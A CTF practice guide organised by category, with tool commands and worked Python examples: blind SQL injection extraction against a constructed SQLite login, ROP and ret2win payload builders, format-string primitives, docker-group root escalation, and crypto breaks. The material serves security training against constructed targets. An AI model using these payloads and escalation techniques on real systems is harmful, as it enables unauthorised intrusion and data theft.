
CTF Practice Guide

CTF Strategy by Category

Web Exploitation

Key techniques:

  • SQL injection (union, boolean blind, time-based)
  • XSS (reflected, stored, DOM-based)
  • SSRF (internal port scan, metadata access)
  • LFI/RFI (log poisoning, PHP wrappers)
  • IDOR (object reference manipulation)
  • Business logic flaws

Tools: Burp Suite, SQLMap, ffuf, Gobuster, Nikto

Practice platforms:

PWN / Binary Exploitation

Key techniques:

  • Buffer overflow (stack, heap)
  • ROP (Return-Oriented Programming)
  • Format string vulnerabilities
  • Integer overflow
  • Use-after-free

Tools: GDB (pwndbg/GEF), pwntools, ROPGadget, ropper, one_gadget

Practice:

```python
# pwntools exploit template (Python, not shell)
from pwn import *

context.update(arch='i386', os='linux')   # set to 'amd64' for 64-bit targets
elf = ELF('./challenge')                  # path is a placeholder; pwntools parses symbols/GOT for you
p = process(elf.path)                     # swap for remote('host', port) against the live instance
# Your exploit code
p.interactive()
```

Practice platforms:

Cryptography

Key techniques:

  • Base64/32/16 encoding
  • XOR cipher (with known/unknown key)
  • RSA attacks (small e, padding oracle, weak keys)
  • AES ECB pattern recognition
  • Hash length extension

Tools: CyberChef, hashcat, John the Ripper, openssl, rsatool

Practice:

CyberChef recipes to know:

  • From Base64 (and From Base32 / From Hex for the other encodings)
  • XOR with a known key, or XOR Brute Force for a single-byte key
  • AES Decrypt with mode set to ECB
  • Analyse hash (guesses the algorithm from the digest length)
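
Two of the listed techniques worked through in code, as an added example that is not part of the original guide: breaking repeating-key XOR from ciphertext alone (key length by normalised Hamming distance, then each key byte by English-frequency scoring), and the RSA small-exponent attack where `e = 3`, no padding is used and the message is short enough that `m**3 < n`, so the ciphertext is a perfect cube over the integers. The plaintext, the key `SPOOK`, the flag and the RSA modulus are constructed for the demo.

```python
"""Break repeating-key XOR with no key material, and recover an RSA e=3
message by integer cube root.  Added example with constructed demo data."""


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR with a repeating key; encryption and decryption are the same op."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def english_score(buf: bytes) -> float:
    """Crude plaintext scorer: rewards spaces and frequent letters, punishes
    control/high bytes that never appear in English text."""
    score = 0.0
    for b in buf:
        if b == 0x20:
            score += 2.0
        elif chr(b) in "etaoinshr":
            score += 1.5
        elif 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A:
            score += 1.0
        elif 0x20 < b < 0x7F or b in (0x09, 0x0A, 0x0D):
            score += 0.1
        else:
            score -= 5.0
    return score


def break_single_byte_xor(column: bytes) -> int:
    """Key byte whose XOR makes the column look most like English."""
    return max(range(256), key=lambda k: english_score(xor_bytes(column, bytes([k]))))


def hamming(a: bytes, b: bytes) -> int:
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def rank_key_sizes(ct: bytes, max_size: int = 40) -> list:
    """Key sizes ordered by normalised Hamming distance between consecutive
    blocks.  At the true length the key cancels (pt_i XOR pt_j) and English
    bytes differ in ~2-3 bits, versus ~4 for unrelated bytes."""
    scores = {}
    for size in range(2, max_size + 1):
        blocks = [ct[i:i + size] for i in range(0, len(ct) - size + 1, size)]
        pairs = list(zip(blocks, blocks[1:]))
        if len(pairs) < 2:
            continue
        scores[size] = sum(hamming(x, y) for x, y in pairs) / (len(pairs) * size)
    return sorted(scores, key=scores.get)


def break_repeating_xor(ct: bytes, candidates: int = 5) -> tuple:
    """Solve every column of the top-ranked key sizes as single-byte XOR and
    keep the (key, plaintext) pair whose plaintext scores best overall."""
    best = None
    for size in rank_key_sizes(ct)[:candidates]:
        key = bytes(break_single_byte_xor(ct[i::size]) for i in range(size))
        pt = xor_bytes(ct, key)
        if best is None or english_score(pt) > best[0]:
            best = (english_score(pt), key, pt)
    return best[1], best[2]


def shortest_period(key: bytes) -> bytes:
    """Collapse a key recovered at a multiple of its length (KEYKEY -> KEY)."""
    for p in range(1, len(key) + 1):
        if key == (key[:p] * len(key))[:len(key)]:
            return key[:p]
    return key


def iroot(x: int, n: int) -> int:
    """Smallest r with r**n >= x, by binary search on big integers."""
    lo, hi = 0, 1 << (x.bit_length() // n + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** n < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def rsa_small_e_attack(c: int, e: int = 3):
    """With e=3, no padding and m**3 < n the modulus never reduces c, so
    c == m**3 over the integers and the plaintext is its exact cube root."""
    m = iroot(c, e)
    return m if m ** e == c else None


# --- constructed demo data ---------------------------------------------------
PLAINTEXT = (
    b"the quick way to get better at capture the flag events is to pick one "
    b"category and drill it until the basic tools feel boring. read the source "
    b"of every challenge you solve, write down what the intended path was, and "
    b"note which dead ends cost you the most time. repeating key xor shows up "
    b"constantly because it is cheap to implement and looks scary in a hex dump, "
    b"but the structure leaks: every byte encrypted under the same key byte shares "
    b"its statistics with english text, so a frequency scorer will find each key "
    b"byte on its own once the key length is known, and the key length itself "
    b"falls out of the hamming distance between consecutive ciphertext blocks."
)
KEY = b"SPOOK"
CIPHERTEXT = xor_bytes(PLAINTEXT, KEY)

P, Q = (1 << 127) - 1, (1 << 89) - 1            # two known primes; N is ~216 bits
N = P * Q
FLAG_INT = int.from_bytes(b"flag{e3}", "big")    # 64-bit m, so m**3 < N and no wrap
RSA_CT = pow(FLAG_INT, 3, N)


def demo() -> tuple:
    key, pt = break_repeating_xor(CIPHERTEXT)
    return shortest_period(key), pt, rsa_small_e_attack(RSA_CT)


if __name__ == "__main__":
    key, pt, m = demo()
    print(key, pt[:60], m.to_bytes(8, "big"))
```

The Hamming step is the part that breaks down on short ciphertexts: with only a few blocks per candidate size the ranking gets noisy, which is why `break_repeating_xor` tries several top-ranked sizes and lets the plaintext score decide rather than trusting the first one. For the RSA case, if `m**3` had exceeded `n` the cube root would not be exact and the function returns `None`; the fix on the defender's side is OAEP padding, which makes `m` as wide as `n`.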

Forensics

Key techniques:

  • File carving (binwalk, foremost)
  • Memory dump analysis (Volatility)
  • PCAP analysis (Wireshark, tcpdump)
  • Steganography (zsteg, steghide)
  • Log analysis

Tools: Volatility, binwalk, foremost, strings, hexedit, Wireshark

Practice:

```bash
# File type detection
file challenge
binwalk challenge
xxd challenge | head

# Carve files
binwalk -e challenge
foremost -i challenge -o output

# Memory analysis (Volatility 3)
python3 vol.py -f memory.dmp windows.info
python3 vol.py -f memory.dmp windows.pslist
python3 vol.py -f memory.dmp windows.malfind
```

OSINT

Key techniques:

  • Google dorking
  • WHOIS lookup
  • DNS enumeration
  • Metadata extraction
  • Social media investigation
  • Breach database search

Tools: theHarvester, Maltego, SpiderFoot, exiftool

Practice:

```bash
# Google dorking examples
site:example.com filetype:pdf
site:example.com "internal"
inurl:admin login

# WHOIS
whois domain.com

# Metadata
exiftool document.pdf
```
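
Metadata extraction is worth understanding below the `exiftool` level, because the interesting fields (camera make/model, author, software, timestamps) are plain TIFF IFD entries inside a JPEG APP1 segment. The following is an added example, not code from the original guide or from ExifTool: it builds a minimal JPEG carrying an EXIF block with a handful of ASCII tags and then parses it back. The tag values are constructed for the demo, and the parser deliberately handles only ASCII-typed entries (GPS coordinates are rationals in a separate sub-IFD and are not covered here).

```python
"""Build a tiny JPEG with an EXIF APP1 segment and read its ASCII tags back.
Added example; the camera/author values are constructed."""
import struct

# IFD0 tags that commonly leak identity (subset; IDs from the TIFF 6.0 spec)
TAG_NAMES = {0x010F: "Make", 0x0110: "Model", 0x0131: "Software",
             0x0132: "DateTime", 0x013B: "Artist", 0x8298: "Copyright"}
ASCII = 2  # TIFF field type for NUL-terminated strings


def build_exif_jpeg(tags: dict) -> bytes:
    """Minimal JPEG: SOI, one APP1/Exif segment (little-endian TIFF holding a
    single IFD of ASCII entries), EOI.  No image data is needed for the demo."""
    entries = sorted(tags.items())
    ifd_len = 2 + 12 * len(entries) + 4          # count, entries, next-IFD pointer
    data_off = 8 + ifd_len                        # values longer than 4 bytes go after the IFD
    ifd, extra = struct.pack("<H", len(entries)), b""
    for tag, value in entries:
        value = value.encode("ascii") + b"\x00"
        if len(value) <= 4:                       # short values live inline in the entry
            ifd += struct.pack("<HHI4s", tag, ASCII, len(value), value.ljust(4, b"\x00"))
        else:                                     # long values are pointed to by offset
            ifd += struct.pack("<HHII", tag, ASCII, len(value), data_off + len(extra))
            extra += value
    ifd += struct.pack("<I", 0)                   # no IFD1 (thumbnail)
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd + extra
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def parse_exif(jpeg: bytes) -> dict:
    """Walk JPEG segments until the Exif APP1 block (or the image data) and
    decode IFD0's ASCII entries into {tag_name: value}."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg):
        marker, seg_len = struct.unpack_from(">HH", jpeg, pos)
        if marker == 0xFFDA:                      # SOS: entropy-coded data follows, stop
            break
        payload = jpeg[pos + 4:pos + 2 + seg_len]  # seg_len counts its own 2 bytes
        if marker == 0xFFE1 and payload.startswith(b"Exif\x00\x00"):
            return parse_ifd0(payload[6:])
        pos += 2 + seg_len
    return {}


def parse_ifd0(tiff: bytes) -> dict:
    endian = "<" if tiff[:2] == b"II" else ">"   # "II" Intel / "MM" Motorola byte order
    (ifd_off,) = struct.unpack_from(endian + "I", tiff, 4)
    (count,) = struct.unpack_from(endian + "H", tiff, ifd_off)
    found = {}
    for i in range(count):
        entry = ifd_off + 2 + 12 * i
        tag, ftype, n = struct.unpack_from(endian + "HHI", tiff, entry)
        raw = tiff[entry + 8:entry + 12]
        if ftype != ASCII:
            continue                              # shorts/rationals (GPS etc.) not handled here
        if n <= 4:
            value = raw[:n]
        else:
            (off,) = struct.unpack_from(endian + "I", raw)
            value = tiff[off:off + n]
        found[TAG_NAMES.get(tag, hex(tag))] = value.rstrip(b"\x00").decode("ascii", "replace")
    return found


SAMPLE_TAGS = {  # constructed values, the kind of thing a leaked photo carries
    0x010F: "Canon", 0x0110: "EOS 5D Mark IV", 0x0131: "v1",
    0x0132: "2021:04:01 10:22:31", 0x013B: "jdoe",
}


def demo() -> dict:
    return parse_exif(build_exif_jpeg(SAMPLE_TAGS))


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:10} {value}")
```

The `Artist`/`Software`/`DateTime` trio is what usually ties an anonymous upload to a person or a workstation, and most platforms strip it on upload precisely for that reason; files pulled from a site's own PDF or image directory (the `site:example.com filetype:pdf` dork above) frequently still have it.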

Privilege Escalation

Linux:

  • SUID/SGID exploitation (GTFOBins)
  • Sudo misconfigurations
  • Kernel exploits
  • Cron job abuse
  • NFS misconfigurations
  • Docker group membership

Windows:

  • Token impersonation (SeImpersonatePrivilege)
  • Service misconfigurations
  • AlwaysInstallElevated
  • Registry autorun
  • DLL hijacking
  • Kernel exploits

Tools: linpeas, winpeas, pspy, accesschk, PowerUp

Practice:

```bash
# Linux privesc checklist
find / -type f -perm -4000 -ls 2>/dev/null   # SUID binaries; check each one against GTFOBins
find / -type f -perm -2000 -ls 2>/dev/null   # SGID binaries
sudo -l                                      # anything runnable as root, ideally NOPASSWD
cat /etc/crontab; ls -la /etc/cron.* /var/spool/cron 2>/dev/null
cat /etc/exports                             # NFS shares; look for no_root_squash
id; groups                                   # docker, lxd, disk, adm group membership
# docker group == root: mount the host filesystem into a throwaway container
docker run -it -v /:/mnt alpine chroot /mnt sh

# Windows privesc checklist
whoami /priv                                 # SeImpersonatePrivilege -> PrintSpoofer / Potato family
whoami /all
net user
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
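
Two of the Linux checks from the list turned into code, as an added example that is not from the original guide, linpeas or pspy: enumerating SUID/SGID files (the `find / -perm -4000` step) and parsing an `/etc/crontab` to flag root jobs whose script is world-writable, which is the cron-abuse primitive. It builds its own temporary directory tree with a constructed crontab, so it runs anywhere; the world-writable test stands in for "writable by the low-privileged user you actually are", which on a real box is `os.access(path, os.W_OK)` run as that user.

```python
"""SUID/SGID enumeration and root-cron writable-script detection.
Added example; it runs against a temporary tree it constructs itself."""
import os
import re
import shlex
import stat
import tempfile


def find_suid_sgid(root: str) -> list:
    """Walk root and return (path, mode) for regular files with SUID or SGID set.
    On a real target run it as the low-privileged user against "/"."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)               # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def parse_system_crontab(text: str) -> list:
    """Parse /etc/crontab-style lines into (schedule, user, command), including
    @reboot-style shortcuts; skip comments and VAR=value assignments."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[0], parts[1], parts[2]))
        else:
            parts = line.split(None, 6)
            if len(parts) == 7:
                jobs.append((" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def writable_root_cron_targets(jobs: list, root: str = "") -> list:
    """For jobs that run as root, return (schedule, path) for every absolute
    path in the command that is world-writable: editing it gives code
    execution as root on the next run.  `root` prefixes paths for the demo."""
    findings = []
    for schedule, user, cmd in jobs:
        if user != "root":
            continue
        for token in shlex.split(cmd, posix=True):
            if not token.startswith("/"):
                continue
            try:
                st = os.stat(root + token)
            except OSError:
                continue
            if st.st_mode & stat.S_IWOTH:
                findings.append((schedule, token))
    return findings


SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/backup.sh >/dev/null 2>&1
@reboot         root    /usr/local/bin/cleanup.sh
0 3     * * *   www-data /var/www/rotate.sh
"""


def build_fake_fs() -> str:
    """Constructed tree: one world-writable root cron script, one safe one,
    one writable script that only runs as www-data, one SUID stand-in."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    for rel, mode in (("opt/backup.sh", 0o777), ("usr/local/bin/cleanup.sh", 0o755),
                      ("var/www/rotate.sh", 0o777), ("usr/bin/fakebin", 0o4755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


def demo() -> dict:
    root = build_fake_fs()
    jobs = parse_system_crontab(SAMPLE_CRONTAB)
    return {"suid": [p[len(root):] for p, _ in find_suid_sgid(root)],
            "cron_writable": writable_root_cron_targets(jobs, root)}


if __name__ == "__main__":
    print(demo())
```

Note what the cron check does not catch: a root job that calls a relative command name resolved through a writable directory on `PATH`, or a script whose parent directory is writable (rename and replace). Both are the same bug one level up, and `pspy` is the quicker way to spot them because it shows the commands as they actually execute.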

Platform-Specific Strategies

HackTheBox

Starting out:

  1. Start with "Starting Point" machines (free)
  2. Connect via OpenVPN
  3. Follow along with friendly walkthroughs initially

Getting better:

  1. Attempt machine for 1-2 hours
  2. If stuck, read hints (not full walkthrough)
  3. Try again
  4. If really stuck, read writeup but don't just copy — understand

Advanced:

  1. Time yourself (2 hours to root)
  2. Root without metasploit (optional challenge)
  3. Do Hard/Insane boxes

TryHackMe

Learning path:

  1. Complete Beginner → Jr. Penetration Tester → Offensive Pentesting
  2. Do rooms in order (they build on each other)
  3. Use PwnedHelper if truly stuck (after trying)

Certification prep rooms:

  • OSCP path
  • eJPT path
  • CEH path

Proving Grounds

Why PG over HTB for OSCP:

  • More similar difficulty to actual exam
  • Some machines are exact recreations
  • Fewer "trick" machines
  • Focus on fundamentals

Strategy:

  1. Do easy machines first
  2. Medium Linux, then medium Windows
  3. Attempt Hard when ready
  4. Practice buffer overflow (pg-pwn series)

Common CTF Patterns

When stuck on Web

```bash
# 1. Check for hidden parameters (use -fs/-fw to filter out the baseline response)
ffuf -w wordlist.txt -u 'http://target/?FUZZ=value'

# 2. Check source code
view-source: or Ctrl+U

# 3. Check cookies
document.cookie in browser console (HttpOnly cookies only show under DevTools > Application)

# 4. Try common injection points
' " ; -- admin' OR '1'='1

# 5. Check for backup files and exposed VCS directories
index.php.bak, config.php~, .git/ (dump it with git-dumper), .svn/
```
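
The boolean-blind SQL injection from the Web list, worked end to end against a throwaway SQLite "application", as an added example that is not from the original guide or from SQLMap: the string-built query, a true/false oracle built on its login behaviour, binary-search extraction of a column one character at a time, and the parameterised fix that kills the oracle. The schema, the accounts and the `admin' AND (...) -- ` payload shape are constructed for the demo; in a real target each `oracle()` call is one HTTP request.

```python
"""Boolean-blind SQLi against an in-memory SQLite app, plus the fix.
Added example; schema and accounts are constructed."""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES ('admin', 's3cr3t_fl4g'), ('bob', 'hunter2');
""")
QUERIES = 0  # requests the attack needed; each would be one HTTP round trip


def login_vulnerable(username: str, password: str) -> bool:
    """String-built query: attacker text becomes SQL."""
    global QUERIES
    QUERIES += 1
    sql = f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{password}'"
    return db.execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    """Parameterised query: the same input is only ever compared as data."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def oracle(condition: str, login=login_vulnerable) -> bool:
    """True iff `condition` holds for the admin row.  The trailing `-- `
    comments out the rest of the original WHERE clause (the password check)."""
    return login(f"admin' AND ({condition}) -- ", "irrelevant")


def blind_int(expr: str, lo: int, hi: int, login=login_vulnerable) -> int:
    """Binary-search the integer value of an SQL expression through the oracle:
    ~log2(range) requests instead of one per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}", login):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(column: str, login=login_vulnerable) -> str:
    """Recover a text column: its length first, then each character's code point."""
    length = blind_int(f"length({column})", 0, 64, login)
    return "".join(chr(blind_int(f"unicode(substr({column}, {i}, 1))", 0, 127, login))
                   for i in range(1, length + 1))


def demo() -> dict:
    global QUERIES
    QUERIES = 0
    secret = blind_extract("password")
    return {"secret": secret, "queries": QUERIES,
            "extract_against_fix": blind_extract("password", login_safe),
            "bypass_vuln": login_vulnerable("admin' OR '1'='1", "wrong"),
            "bypass_safe": login_safe("admin' OR '1'='1", "wrong")}


if __name__ == "__main__":
    print(demo())
```

Against `login_safe` the oracle never returns true (the quote is just part of a username that does not exist), so the length search bottoms out at 0 and nothing is extracted; that is the whole argument for parameterised queries over input filtering. The `> mid` comparison is also the trick to remember when `=` is blocked by a WAF, and swapping `oracle()` for one that measures response time turns the same extraction loop into the time-based variant.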

When stuck on PrivEsc

```bash
# Linux:
# 1. Run linpeas.sh
# 2. Check SUID (GTFOBins)
# 3. Check sudo -l
# 4. Check cron
# 5. Check /etc/exports (NFS)

# Windows:
# 1. Run winpeas.bat
# 2. Check SeImpersonatePrivilege (printspoofer)
# 3. Check services (accesschk)
# 4. Check AlwaysInstallElevated
# 5. Check registry autoruns
```

When stuck on PWN

```bash
# 1. Understand the binary
checksec binary                # NX, PIE, stack canary, RELRO
rabin2 -i binary               # imports
rabin2 -R binary               # relocations

# 2. Find offset
cyclic 100                     # generate a pattern and feed it to the binary
cyclic -l 0x61616168           # look up the value that landed in EIP/RIP -> offset

# 3. Find gadgets
ROPgadget --binary binary
ropper --file binary

# 4. If format string
%p %p %p %p                    # leak stack words
%<num>$p                       # leak the num-th argument (a stack word)
%<num>$s                       # dereference the num-th stack word (read arbitrary memory)
%<num>$n                       # write the number of chars printed so far to that pointer
```
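
The "find offset" and "build the chain" steps without pwntools, as an added example that is not from the original guide or from the pwntools project: a de Bruijn pattern generator equivalent to `cyclic` / `cyclic -l` (same lowercase alphabet and 4-byte windows, so offsets agree with the tool), the `p32`/`p64` packers, and two payload builders, 32-bit ret2win and an x86-64 `system("/bin/sh")` ROP chain. The crash register value and every address (win function, `pop rdi; ret`, the `/bin/sh` string, `system`, the alignment `ret`) are constructed, not taken from a real binary; this also serves the pwntools template in the PWN section above.

```python
"""cyclic / cyclic -l and payload builders without pwntools.
Added example; crash value and gadget addresses are constructed."""
import string
import struct
from itertools import islice

ALPHABET = string.ascii_lowercase  # pwntools' default alphabet, n=4


def de_bruijn(alphabet: str = ALPHABET, n: int = 4):
    """Yield the lexicographically smallest de Bruijn sequence B(k, n): every
    n-character window occurs exactly once, so a window pins down its offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for x in a[1:p + 1]:
                    yield alphabet[x]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """`cyclic <length>`: the pattern to overflow the buffer with."""
    return "".join(islice(de_bruijn(ALPHABET, n), length)).encode()


def cyclic_find(value, n: int = 4) -> int:
    """`cyclic -l <value>`: offset of the n-byte window that landed in the
    register; accepts raw bytes or the little-endian register value."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    window = b""
    for i, ch in enumerate(de_bruijn(ALPHABET, n)):
        window = (window + ch.encode())[-n:]
        if window == needle:
            return i - n + 1
    return -1


def p32(x: int) -> bytes:
    return struct.pack("<I", x)


def p64(x: int) -> bytes:
    return struct.pack("<Q", x)


def ret2win_payload(offset: int, win_addr: int) -> bytes:
    """32-bit: pad up to the saved EIP, then overwrite it with win()."""
    return b"A" * offset + p32(win_addr)


def rop_system_binsh_x64(offset: int, pop_rdi_ret: int, binsh: int,
                         system: int, ret: int = None) -> bytes:
    """x86-64 SysV: the first argument travels in RDI, so `pop rdi; ret` loads
    the "/bin/sh" pointer before returning into system().  An extra `ret`
    gadget first keeps RSP 16-byte aligned for glibc's SSE instructions."""
    chain = [p64(pop_rdi_ret), p64(binsh), p64(system)]
    if ret is not None:
        chain.insert(0, p64(ret))
    return b"A" * offset + b"".join(chain)


def demo() -> dict:
    pattern = cyclic(200)
    # Constructed crash: the program copied `pattern` into a 76-byte stack buffer,
    # so the saved return address now holds pattern[76:80]; gdb shows it as EIP.
    eip = struct.unpack("<I", pattern[76:80])[0]
    offset = cyclic_find(eip)
    return {"pattern_head": pattern[:20], "eip": hex(eip), "offset": offset,
            "ret2win": ret2win_payload(offset, 0x08049196),        # constructed win() address
            "rop64": rop_system_binsh_x64(72, 0x401263, 0x402008,  # constructed gadget/string
                                          0x401040, ret=0x40101a)}  # addresses for a non-PIE binary


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Why a de Bruijn sequence rather than `AAAABBBBCCCC`: with 4-byte windows that are globally unique, one crash tells you the exact offset even when the overflow lands somewhere unexpected (a saved EBP, a pointer, a second buffer), where a repeating pattern would be ambiguous. The alignment `ret` in the 64-bit chain is the usual reason a chain that "looks right" segfaults inside `system()` instead of spawning a shell.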

Flag Patterns

Common flag formats:

  • flag{...}
  • CTF{...}
  • p_ctf{...}
  • THC{...}
  • pragyan{...}

```bash
# Search for flags in files
strings file | grep -i flag
grep -r "flag{" .
find . -name "*.txt" -exec grep -l "flag" {} \;

# In PCAP files
tshark -r capture.pcap -Y "http" -T fields -e http.file_data | grep flag
```

Practice schedule:

  Daily:   1 HTB machine OR 1 THM room (1-2 hours)
  Weekly:  1 CTF (3-5 hours)
  Monthly: 1 certification exam attempt OR PG session

Weekly focus:
- Mon: Recon/web
- Tue: PrivEsc
- Wed: Crypto/forensics
- Thu: Network/web
- Fri: Pwn (if preparing for OSCP)

Key Takeaways

  1. Struggle before looking at solutions — you learn more from failing and trying again
  2. Take notes — document what you tried, what worked, why
  3. Read writeups — even after solving, read how others approached it
  4. Focus on fundamentals — basic skills beat fancy techniques
  5. Practice consistently — 1 hour daily beats 7 hours on weekends

Educational Use Only | Made with ❤️